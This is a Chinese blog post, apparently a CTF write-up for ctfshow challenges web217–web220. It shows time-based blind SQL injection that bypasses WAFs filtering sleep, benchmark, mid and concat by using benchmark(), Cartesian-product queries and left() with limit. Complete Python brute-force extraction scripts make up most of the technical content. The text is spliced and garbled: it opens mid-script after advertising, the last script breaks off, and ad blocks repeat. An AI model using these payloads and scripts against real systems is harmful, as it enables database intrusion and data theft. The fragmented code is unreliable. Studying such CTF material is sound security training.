2024年ctfshow-web延时注入平替-web217~web220(1),网络安全通用流行框架大全

最新推荐文章于 2024-08-27 02:37:30 发布
最新推荐文章于 2024-08-27 02:37:30 发布
阅读量879 收藏 29
点赞数 14
分类专栏: 程序员 文章标签: 前端 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264692/article/details/138457195
版权

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

    req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
    time.sleep(0.3)
except Exception as e:
    return strs
return ""

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=3):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = ‘’
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

        # 处理返回结果
        results = []

        for task in tasks:
            result = task.result()
            if result:
                flagStr += (result.split(':'))[1]
                results.append(result)
    if results:
        allList.append(results)
    else:
        break
    print(flagStr)
string = flag
for i in allList:
    if i!=[] or i!=[[]] or bool(i):
        string += (i[0].split(':'))[-1]
print('flag: ',string)

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web216():
    url = "http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxcc')"
    payload3 = "select(group\_concat(flagaac))from(ctfshow\_flagxcc)"
    # ctfshow\_flagxcc,ctfshow\_info
    # GetData3(url,payload="to\_base64({})".format("if(mid(("+payload1+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
    # id,flagaac,info
    # GetData3(url,payload="to\_base64({})".format("if(mid(("+payload2+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
    GetData3(url, flag='ctfshow{', start=9, end=55,payload="to\_base64({})".format("if(mid(("+payload3+"),{},1)='{}',sleep(5),1)"), flagStrDict=flagStrDict2, timeout=5)

web216()


payload部分在于:

def web216():
url = “http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxcc’)”
payload3 = “select(group_concat(flagaac))from(ctfshow_flagxcc)”
# ctfshow_flagxcc,ctfshow_info
# GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload1+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)
# id,flagaac,info
# GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload2+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)
GetData3(url, flag=‘ctfshow{’, start=9, end=55,payload=“to_base64({})”.format(“if(mid((”+payload3+“),{},1)=‘{}’,sleep(5),1)”), flagStrDict=flagStrDict2, timeout=5)


其中,要注意点在于:网络不好就没必要跑脚本了,因为实在……太依赖网络状态了。。。


半夜开了5G测试,一直出错误。同一个payload放BP跑了不到五分钟就全出来了,我……


## web217


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep/i',$str);
} 


### 解题


这个题目过滤了 `sleep` ,导致常用延时注入函数被过滤。这里对 `sleep` 的平替方案为:

select sleep(3):

平替为:

select benchmark(3500000,md5(‘www’));


具体的平替时间是测试出来的,使用 `Burp` 抓包出来进行平替测试即可。


具体测试方案就是:设置 `3s` 延迟,让后放上这种句子进行测试:`ip=if(1,benchmark(3500000,md5('www')),1)&debug=1` .


![测试](https://img-blog.csdnimg.cn/direct/8858c7edd5f142fcb8483d1859d93335.jpeg#pic_center)


脚本如下,注意网络环境对延时注入的影响。

coding=utf-8

import requests,time,concurrent.futures
“”"
多线程爆破脚本
“”"

def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return “”

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=5):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = flag
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

        # 处理返回结果
        results = []

        for task in tasks:
            result = task.result()
            if result:
                flagStr += (result.split(':'))[1]
                # print([result],type(result))
                results.append(result)
    if results:
        allList.append(results)
    else:
        print("No results {}".format(index))
        break
    print(flagStr)
string = flag
for i in allList:
    if i!=[] or i!=[[]] or bool(i):
        string += (i[0].split(':'))[-1]
print('flag: ',string)
    # t = threading.Thread(target=send\_request,args=(urls,headers,data,timeout,flag,mid,i,payload))

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web217():
    url = "http://4afe2ce4-af43-46e5-a9c1-79b4b85cb45f.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxccb')"
    payload3 = "select(group\_concat(flagaabc))from(ctfshow\_flagxccb)"
    # ctfshow\_flagxccb,ctfshow\_info
    # GetData3(url,payload="{}".format("if(mid(("+payload1+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
    # id,flagaabc,info
    # GetData3(url,flag='id,flag',start=8,payload="{}".format("if(mid(("+payload2+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
    GetData3(url, flag='ctfshow{', start=9, end=55,payload="{}".format("if(mid(("+payload3+"),{},1)='{}',benchmark(3500000,md5('www')),1)"), flagStrDict=flagStrDict2, timeout=5)

web217()


## web218


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep|benchmark/i',$str);
}   


### 解题


这过滤……又要寻找平替方案……


还有一个平替方案,利用大量的查询消耗时间:

if(mid(1,(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d),1)


其中的 `SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d` 便是起到平替作用的sql查询语句。(笛卡尔积)


如果是使用延迟2s的话,特别考验爆破者的网络环境。特别是这种情况下特别容易出现flag错误的情况。



> 
> 注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。
> 
> 
> 使用要求:
> 
> 
> 1. 测试者正常回显(非测试笛卡尔积)的情况下延迟在0到1s之间。
> 2. 测试者测试笛卡尔积的时候延迟在1.7或者大于1.7的范围。
> 
> 
> 


下面是脚本:

coding=utf-8

import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()

“”"
单线程爆破
“”"

def GetData5(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}

thresholdNumber = 2
for i in range(start,end):
    mf = 0
    for mid in flagStrDict:

        data = {
            "ip":payload.format(i,mid),
            "debug":1
        }
        t1 = time.time()
        thresholds = 0

        # 使用数据包阈值来过滤废包
        # 经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间

        try:
            t = time.time()
            req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
            endTime = time.time() - t
            time.sleep(0.3)

            print(Style.BRIGHT+'find time',
                  Style.RESET_ALL +f": {endTime:.3f} s \t ",
                  Style.BRIGHT+'and find payload',
                  Style.RESET_ALL +f": {payload.format(i,mid)}"
                  )
            # print(req.content)
        except Exception as e:
            for threshold in range(thresholdNumber):
                try:
                    t = time.time()
                    req = requests.post(url=urls, headers=headers, data=data, timeout=timeout)
                    endTime = time.time() - t
                    time.sleep(0.3)

                    print(Style.BRIGHT + 'find time',
                          Style.RESET_ALL + f": {endTime:.3f} s \t ",
                          Style.BRIGHT + 'and find payload',
                          Style.RESET_ALL + f": {payload.format(i, mid)}"
                          )
                except Exception as e:
                    thresholds += 1
                    print(Fore.RED+'the number',Style.BRIGHT+f": {thresholds} ",Style.RESET_ALL + "-")

        endTime = time.time() - t1
        if mode == 1 and thresholds == thresholdNumber:
            flag += mid
            # print(f"index: {i}\t all time:{endTime:.3f}\t flag:{flag}")
            print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
            break
        elif mode == 2 and thresholds == thresholdNumber:
            flag += chr(int(mid,16))
            # print(f"{Back.GREEN+'index'}: {i}\t {Back.GREEN+'all time'}:{endTime:.3f}\t {Back.GREEN+'flag'}:{Style.BRIGHT+'flag'}",end=' ')
            print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
            print(Style.RESET_ALL + "-")
            break
        else:
            mf += 1

            # print(payload.format(i,mid))
    if mf == len(flagStrDict):
        print("flag is :"+flag)
        break

if name == “__main__”:
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”
flagStrDict3 = “id,flagah,infoctfshow,_0123456789abdegijklmnpqruvxyz”
flagStrDict4 = “id,flagno_0123456789bcehjkmpqrstuvwxyz”

def web218():
    url = "http://736e0672-8f98-43d0-ae4d-3660b56cfda7.challenge.ctf.show/"
    payload1 = "select(group\_concat(table\_name))from(information\_schema.tables)where(table\_schema=database())"
    payload2 = "select(group\_concat(column\_name))from(information\_schema.columns)where(table\_name='ctfshow\_flagxc')"
    payload3 = "select(group\_concat(flagaac))from(ctfshow\_flagxc)"

    timeOutFunction = "(SELECT COUNT(\*) FROM information\_schema.tables a, information\_schema.tables b, information\_schema.tables c)"

    # ctfshow\_flagxc,ctfshow\_info
    # GetData5(url,flag='ctfshow\_',start=9,payload="if(mid((" + payload1 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict1,timeout=1.7)
    # id,flagaac,info
    # GetData5(url,payload="if(mid((" + payload2 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict4,timeout=1.7)
    """

ctfshow{3e19223f-d564-4aae-945e-55a2656f1c27}
ctfshow{3e192230-d564-4aae-945e-56a2656f1c27}
ctfshow{3e19223f-d564-4aae-945e-56a2656f1c27}
“”"
GetData5(url,flag=‘ctfshow{’, start=9, end=55,payload=“if(mid((” + payload3 + “),{},1)=‘{}’,”+timeOutFunction+“,1)”,flagStrDict=flagStrDict2,timeout=1.7)

web218()


多跑两次,flag有一定概率会出错,测试的时候多测试两次不会吃亏。如果能一次提交正确就没必要测了。


## web219


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep|benchmark|rlike/i',$str);
}   


### 解题


没有限制到笛卡尔积,沿用上面的脚本即可。


## web220


### 原始信息


查询语句




   where id = ($id);


返回逻辑




//屏蔽危险分子
function waf($str){
    return preg\_match('/sleep|benchmark|rlike|ascii|hex|concat\_ws|concat|mid|substr/i',$str);
}   


### 解题


首先考虑时间盲注,依然还是只能使用笛卡尔积。


其次考虑其它payload点位的限制。


上次的payload是带有`concat/mid` 两种的,而这两种恰巧对应组合和切割两种情况。


`concat` 对应限制 `group_concat` 列组合方法,用 `limit {} 1` 绕过。 `{}` 是爆破的第 `0` 行到第 `n` 行。


`mid` 采用 `left/right` 两种的其中一种进行绕过。这俩都是切割函数,但是没有 `mid` 的按位置切割,只能从头切割到末尾/从末尾切割到头。



> 
> 注意:这里还是得注意下网络的延迟问题。延迟测算好后再用payload。
> 
> 
> 


下面是脚本:

coding=utf-8

import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()

def GetData6(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url
}

# 容错数据包次数
thresholdNumber = 4

flagTest = ''


# 控制查表的爆破行
for rows in range(10):
    flagTemp = ''
    # flagEnd = flagTemp
    # 控制查表爆破行中的列数据
    for columns in range(start,end):
        mf = 0
        # 控制查表爆破列的数据匹配
        for strDict in flagStrDict:
            # 使用十六进制的形式避免出现非预期情况
            payloadEd = '0x'+''.join([(hex(ord(i))).replace('0x','') for i in flagTemp+strDict])
            data = {
                "ip":payload.format(rows,columns,payloadEd),
                "debug":1
            }
            # 容错变量
            thresholds = 0

            # 使用数据包阈值来过滤废包
            # 经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间

            t1 = time.time()

            def miniNumber():
                t = time.time()
                requests.post(url=urls, headers=headers, data=data, timeout=timeout)
                endTime = time.time() - t
                time.sleep(0.3)

                print(Style.BRIGHT + 'Find time', end=":")
                print(Style.RESET_ALL + f"{endTime:.3f} s \t ", end="")
                print(Style.BRIGHT + 'And find payload', end=':')
                print(Style.RESET_ALL + f"{payload.format(rows, columns, payloadEd)}")


            try:
                miniNumber()

            except Exception as e:
                # 经过第一层超时后进行容错处理
                for threshold in range(thresholdNumber):
                    try:
                        miniNumber()

                    except Exception as e:
                        thresholds += 1
                        print(Fore.RED + 'the number',end=" : ")
                        print(Style.BRIGHT + f"{thresholds} ",end="")
                        print(Style.RESET_ALL + "")

            endTime = time.time() - t1

            if thresholds == thresholdNumber:
                # 容错成功后组合flag字符串/关键字符串
                flagTemp += strDict
                print(f"{Back.GREEN + 'index'}: {rows} {columns}", end="\t")
                print(f"{Back.GREEN + 'all time'}",end=":")
                print(Style.BRIGHT + f"{endTime:.3f}",end="\t ")
                print(Back.GREEN + 'flag', end=":")
                print(Style.BRIGHT + f'{flagTemp}',end='')
                print(Style.RESET_ALL + "")
                break
            else:
                mf += 1

        if mf == len(flagStrDict):
            #列数据结束标志
            print("flag is :" + flagTemp)
            print('all :',flagTest)
            break

    if '' == flagTemp:
        #行数据结束标志
        print('flag is :' + flagTest)
        break
    else:
        flagTest += flagTemp if flagTest == '' else ','+flagTemp
        print(flagTest)

if name == “__main__”:
# 字符串字典
# find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
# find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”
flagStrDict4 = “id,flagno_0123456789bcehjkmpqrstuvwxyz”

def web220():
    url = "http://8f817a4c-a121-4798-8e3c-35669806ab66.challenge.ctf.show/"
    payload1 = "select(table\_name)from(information\_schema.tables)where(table\_schema=database()) limit {},1"
    payload2 = "select(column\_name)from(information\_schema.columns)where(table\_name='ctfshow\_flagxcac') limit {},1"
    payload3 = "select(flagaabcc)from(ctfshow\_flagxcac) limit {},1"
    print(url)
    """

payload
if(left((select(xxx)from(yyyy0)limit {3},1),{1})=‘{2}’,?,1)
切割的办法:
假设:a=ctfshow_flagxca
left(a,1) = c

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

)from(yyyy0)limit {3},1),{1})=‘{2}’,?,1)
切割的办法:
假设:a=ctfshow_flagxca
left(a,1) = c

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
[外链图片转存中…(img-qwNxtpcq-1714853505094)]
[外链图片转存中…(img-tuJP6Q1D-1714853505095)]
[外链图片转存中…(img-brHw4Xjm-1714853505096)]
[外链图片转存中…(img-vxichsqD-1714853505096)]
[外链图片转存中…(img-qidlLbgD-1714853505097)]
[外链图片转存中…(img-yOFDhgpq-1714853505098)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

2401_84264692
关注
专栏目录
网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 9324
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
web渗透--22--SQL注入(上)
武天旭的博客
09-15 9566
1、漏洞描述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。造成SQL注入漏洞原因有两个:一个是没有对输入...
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7252
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow-web延时注入平替-web217~web2202024最新2024网络安全开发实战
2401_84164527的博客
04-09 1039
天花板技术停滞不前!**
ctfshow-web延时注入平替-web217~web220
2401_86044238的博客
08-27 257
而下面的脚本,速度虽然慢,但会主动拼接脚本:……总是失效,具体原因不知道,但确实是爆出来flag过。啥都没有的情况,刷新主页面(不是那个支线的sqlmap页面)看抓包信息,抓到一个敏感数据包:……同一个payload放BP跑了不到五分钟就全出来了,我。这个脚本因为是单线程爆破,很大程度上会受到网络波动的影响……最好就放BP进行快爆吧。其中,要注意点在于:网络不好就没必要跑脚本了,因为实在。注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。具体的平替时间是测试出来的,使用。
ctfshow-web延时注入平替-web217~web220,拿下offer全凭这套“面试+架构进阶知识点”pdf
2401_83739777的博客
04-03 718
Win64;x64;
CTFshow-web爆破
weixin_44770698的博客
06-24 1136
CTFshow-web爆破wp
【愚公系列】202402月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
热门推荐
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4470
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
CTFshow-萌新 Writeup
Atkx's Blog
05-06 4536
这里写自定义目录标题萌新_密码1萌新_密码2萌新 密码3萌新 隐写2 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式:KEY{XXXXXXXXXXXXXX} hex转字符串 m="53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D3
wp ctfshow 萌新 web17--web22
2301_81040377的博客
03-29 236
web18,把file绕过了,难不成web17有直接构造payload的做法,我等会试试,我还是用的老办法直接看日志文件。问了我的好学长为什么日志包含,因为有“include”,然后没有禁用文件所以日志包含。到手,第一次做文件包含的题真的还暂时不是很明白。剩下的明天做今天准备看一点cr入门。user-agent传一句话木马。思路:include文件包含,然后用antsword来连接。我还没买vps的,先放着吧。美好的一天从做题开始。
CTFshow爆破之web22
potatojiang的博客
07-26 86
光注意做题却忘记审题了,因为是新手还搞了半天。直接提交flag就行了。
ctfshow web入门-sql注入
LYJ20010728的博客
09-21 2962
ctfshow web入门-sql注入web171web172web173web174web175web176web177web178web179web180web181web182web183web184web185web186web187web188web189web190web191web192web193web194web195web195web197web198web199web200web201web202web203 web171 根据题目给出的查询语句构造 Payload $sql
CTFshow web入门——文件包含
小元砸的博客
02-07 3934
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 813
重新来做一遍 争取不看wp。
CTFSHOW_萌新计划web1-24
A的博客
08-19 848
随便写一下。
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4829
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
CTFshow 爆破 web22
Kradress的博客
10-28 332
根据提示 域名也可以爆破的,试试爆破这个ctf.show的子域名 扫到一般发现没有结果 ,这题也不能做了 直接看hint, 页面也是失效的 直接拿走flag
ctfshow dockerfile
最新发布
08-30
CTFShow Dockerfile通常是指一个用于容器化(Containers)的安全挑战(Capture The Flag, CTF)环境的一种Docker构建文件。Dockerfile是一种文本文件,它包含了创建一个Docker镜像所需的所有指令。如果CTFShow是一个包含网络安全挑战的项目,Dockerfile会定义如何从基础镜像开始,安装必要的软件包、设置环境变量、复制必要的文件,以及运行特定的服务或工具。 例如,一个基本的CTFShow Dockerfile可能会这样编写: ```dockerfile # 使用官方的基础镜像作为起点 FROM ubuntu:latest # 更新包列表并安装必要的软件 RUN apt-get update && apt-get install -y \ nginx \ python3 \ python3-pip # 安装所需的Python库 RUN pip3 install Flask ctf-framework # 将本地目录的内容复制到容器内部 COPY . /app # 设置工作目录和运行命令 WORKDIR /app CMD ["python3", "app.py"] ``` 这个Dockerfile会让镜像启动一个基于Flask的web服务器,用于展示CTF挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值